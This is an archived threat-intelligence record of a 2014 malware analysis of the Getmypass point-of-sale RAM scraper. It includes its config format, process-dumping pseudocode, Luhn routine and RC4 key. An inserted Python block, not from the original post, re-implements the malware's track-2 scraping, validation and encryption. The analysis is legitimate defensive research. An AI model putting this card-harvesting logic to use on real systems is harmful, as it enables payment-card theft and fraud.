{
	"id": "88e06b6c-d878-4d9e-9918-d0c3c1008964",
	"created_at": "2026-04-06T00:07:02.958845Z",
	"updated_at": "2026-04-10T03:20:36.966481Z",
	"deleted_at": null,
	"sha1_hash": "50e468ea3619fb8818521231f5c16d813c8eccb8",
	"title": "Getmypass Point of Sale Malware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 133511,
	"plain_text": "Getmypass Point of Sale Malware\r\nPublished: 2014-11-26 · Archived: 2026-04-02 11:38:38 UTC\r\nIntroduction\r\nWhile doing some digging recently on VirusTotal I had a rule trigger on what appears to be a new POS malware\r\nfamily.\r\nThe MD5 (1d8fd13c890060464019c0f07b928b1a) is the malware that I will be dissecting in this post.\r\nThe first interesting thing that struck my eye is the incredibly low detection rate which at the time of this writing\r\nwas 0/55.\r\nSecondly (and what may be affecting detection) is that the binary is signed from “Bargaining active” which is\r\ncurrently a valid certificate.\r\nSo digging into the code a bit, this malware appears to do something in common with other POS RAM scrapers.\r\nProcess Dumping\r\nSearching for CC data\r\nhttps://securitykitten.github.io/2014/11/26/getmypass-point-of-sale-malware.html\r\nPage 1 of 5\n\nValidation using Luhn’s algorithm\r\nWriting that to a file\r\nEncrypting / Encoding file\r\nThere doesn’t appear to be any C2 functionality in this particular piece of malware so this is more of a utility than\r\na backdoor. This malware also does not contain code to do any of the following:\r\nLateral movement\r\nCredential harvesting\r\nPushing the harvested data to a non-local file\r\nKeylogging\r\nAnalysis\r\nThe malware will first search for an ini file named 1.ini in the same directory as the malware. Without the ini file\r\nthe malware will exit. Thanks to Josh Grunzweig for pointing out the ini format.\r\n[settings]\r\nproc=notepad.exe\r\ntime=1000\r\ncryp=1\r\nThe cryp argument is responsible for toggling on/off functionality to encrypt the collected CC data with RC4.\r\nThe malware will also create a mutex when running “1yn8RQLkm8”\r\nDiving in head first, the first function that stuck out to me is at loc 0x402360. This function is responsible for\r\niterating over processes, calling OpenProcess, and then ultimately ReadProcessMemory.\r\nVery (very!) 
rough logic for this would resemble:\r\nprocs = CreateToolhelp32Snapshot\r\nProcess32FirstW(procs)\r\ndo\r\n    OpenProcess\r\n    while true\r\n        if VirtualQueryEx\r\n            ReadProcessMemory\r\n        else\r\n            break\r\n    CloseHandle\r\nwhile Process32NextW\r\nCloseHandle\r\nVirtualFree\r\nMany POS RAM scrapers use this same sort of loop to crawl and enumerate processes. One difference is that this malware uses a whitelist (the proc entry in the ini file) and only dumps the processes the operator specifies.\r\nThe original post includes a screenshot of the configuration file 1.ini and the encrypted track 1 and track 2 CC information.\r\nWhen running the malware in a debugger, I pasted sample track data into notepad and stepped through execution. The malware will locate the notepad process (using the above loop) and then pass those results to a function that searches for strings that look like track data. These are then parsed and the results are passed to a function that uses the Luhn algorithm to check for valid numbers. A lookup table (0,2,4,6,8,1,3,5,7,9, i.e. the digit sum of each doubled digit) is used rather than calculating a digital root. 
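The scrape, Luhn check and RC4 output steps described in this section, re-implemented in Python as an added example; this is not code from the original post or from the malware itself. It assumes that track 2 data sits in the dumped memory as plain ASCII, that the report records are CRLF separated, and that the RC4 step is vanilla RC4 keyed with the raw ASCII bytes of 'getmypass' (the password the post reports below) with no IV; those layout details, the sample memory buffer and the test card numbers are all constructed for the example. The lookup table from the decompiled routine is checked against the textbook double-and-subtract-9 rule, and decode_rep_bin shows the analyst-side decryption of a captured rep.bin.

```python
# Added example, not the malware's code or the post author's code. Re-creates the
# pipeline the post describes: find track 2 data in a memory dump, keep the
# Luhn-valid PANs, RC4 the report with the key 'getmypass', and (analyst side)
# decrypt a captured rep.bin. Assumptions not stated in the post: ASCII track
# data, CRLF-separated records, vanilla RC4 with the raw ASCII key and no IV.

RC4_KEY = b'getmypass'          # password reported in the post
SEP = chr(13) + chr(10)         # CRLF record separator (assumed layout)

# Lookup table from the decompiled routine: LUHN_DOUBLE[d] is the digit sum
# of 2*d, which is 2*d when 2*d < 10 and 2*d - 9 otherwise.
LUHN_DOUBLE = (0, 2, 4, 6, 8, 1, 3, 5, 7, 9)


def luhn_table(pan: str) -> bool:
    'Luhn check the way the malware does it: right to left, table for every second digit.'
    total = 0
    odd = True                   # rightmost digit is added as-is
    for ch in reversed(pan):
        d = ord(ch) - 48
        if d < 0 or d > 9:       # non-digit: not a PAN
            return False
        total += d if odd else LUHN_DOUBLE[d]
        odd = not odd
    return total % 10 == 0


def luhn_reference(pan: str) -> bool:
    'Textbook Luhn (double, subtract 9 if over 9); used to confirm the table version.'
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def find_track2(buf: bytes) -> list:
    'Return (pan, record) pairs for every ;PAN=YYMMsss...? track 2 string in buf.'
    text = buf.decode('latin-1')
    found = []
    start = 0
    while True:
        i = text.find(';', start)
        if i < 0:
            break
        j = i + 1
        while j < len(text) and '0' <= text[j] <= '9':
            j += 1
        pan = text[i + 1:j]
        k = text.find('?', j)
        tail = text[j + 1:k] if k > j else ''
        if (13 <= len(pan) <= 19 and j < len(text) and text[j] == '='
                and 4 <= len(tail) <= 40 and all('0' <= c <= '9' for c in tail)):
            found.append((pan, text[i:k + 1]))
            start = k + 1
        else:
            start = i + 1
    return found


def rc4(key: bytes, data: bytes) -> bytes:
    'Plain RC4 (KSA + PRGA); encrypting and decrypting are the same call.'
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xff
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for b in data:
        i = (i + 1) & 0xff
        j = (j + s[i]) & 0xff
        s[i], s[j] = s[j], s[i]
        out.append(b ^ s[(s[i] + s[j]) & 0xff])
    return bytes(out)


def scrape(memory: bytes, cryp: int = 1) -> bytes:
    'Malware side: Luhn-valid track 2 records, RC4-encrypted when cryp=1.'
    records = [rec for pan, rec in find_track2(memory) if luhn_table(pan)]
    report = SEP.join(records).encode('ascii')
    return rc4(RC4_KEY, report) if cryp else report


def decode_rep_bin(blob: bytes) -> list:
    'Analyst side: recover the records from a captured rep.bin.'
    return rc4(RC4_KEY, blob).decode('ascii').split(SEP)


# Constructed sample of notepad memory: a Luhn-valid test PAN (4111...1111),
# the same PAN with its check digit changed (fails Luhn), and surrounding noise.
SAMPLE_MEMORY = (b'some unrelated text ;4111111111111111=25121010000000000000? more '
                 b'noise ;4111111111111112=25121010000000000000? trailing bytes')

if __name__ == '__main__':
    print('recovered:', decode_rep_bin(scrape(SAMPLE_MEMORY)))
```

Running the block prints the single record that survives the Luhn filter, recovered from the RC4-encrypted report; calling scrape() with cryp=0 returns the same record in the clear, which matches the post's observation that disabling cryp writes plaintext to rep.tmp and rep.bin. The table walk and the textbook rule agree on every input because each table entry is exactly the doubled digit with 9 subtracted when it overflows.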
The malware's routine is the same version of the algorithm used in FrameworkPOS and Dexter. The decompiled body follows (a1 is the wide-character digit string, a2 its length; v5..v14 form the lookup table on the stack):\r\n    v5 = 0;\r\n    v6 = 2;\r\n    v7 = 4;\r\n    v8 = 6;\r\n    v9 = 8;\r\n    v10 = 1;\r\n    v11 = 3;\r\n    v12 = 5;\r\n    v13 = 7;\r\n    v14 = 9;\r\n    v16 = 1;\r\n    v15 = 0;\r\n    v17 = a2;\r\n    while ( 1 )\r\n    {\r\n        v2 = v17--;\r\n        if ( !v2 )\r\n            break;\r\n        if ( v16 )\r\n            v4 = *(_WORD *)(a1 + 2 * v17) - 48;\r\n        else\r\n            v4 = *(&v5 + *(_WORD *)(a1 + 2 * v17) - 48);\r\n        v15 += v4;\r\n        v16 = v16 == 0;\r\n    }\r\n    return v15 % 10 == 0;\r\n}\r\nWhich in source code would look more like this (the decompiled version reads 16-bit characters, but the arithmetic is identical):\r\nint IsValidCC(const char* cc, int CClen)\r\n{\r\n    const int m[] = {0,2,4,6,8,1,3,5,7,9}; // doubled-digit sums: 2*d, minus 9 when 2*d > 9\r\n    int i, odd = 1, sum = 0;\r\n    /* walk right to left: the rightmost digit is added as-is, every second digit goes through m[] */\r\n    for (i = CClen; i--; odd = !odd) {\r\n        int digit = cc[i] - '0';\r\n        sum += odd ? digit : m[digit];\r\n    }\r\n    return sum % 10 == 0;\r\n}\r\nOnce the numbers have been validated, they are passed to an RC4 function and written out to rep.tmp and rep.bin; the RC4 password used is “getmypass”.\r\nDisabling the “cryp” option in the config file will write plaintext data to the rep.tmp and rep.bin files.\r\nFinal Thoughts\r\nTo run this malware successfully the attacker would need several pieces of information:\r\n- Credentials\r\n- Name of the POS executable / service\r\n- A method for moving the data out of the network\r\nThis malware seems to be in its infancy. Debug strings still present in the binary indicate to me that the author is still testing the tool or is still actively developing it.\r\nIt’s important to track tools like this from their very young stages so that researchers can watch them develop and eventually grow into the next big tool. 
While this isn’t the most advanced POS RAM scraper there is, it’s still capable of bypassing all 55 AV engines used to scan it.\r\nSource: https://securitykitten.github.io/2014/11/26/getmypass-point-of-sale-malware.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://securitykitten.github.io/2014/11/26/getmypass-point-of-sale-malware.html"
	],
	"report_names": [
		"getmypass-point-of-sale-malware.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434022,
	"ts_updated_at": 1775791236,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/50e468ea3619fb8818521231f5c16d813c8eccb8.pdf",
		"text": "https://archive.orkl.eu/50e468ea3619fb8818521231f5c16d813c8eccb8.txt",
		"img": "https://archive.orkl.eu/50e468ea3619fb8818521231f5c16d813c8eccb8.jpg"
	}
}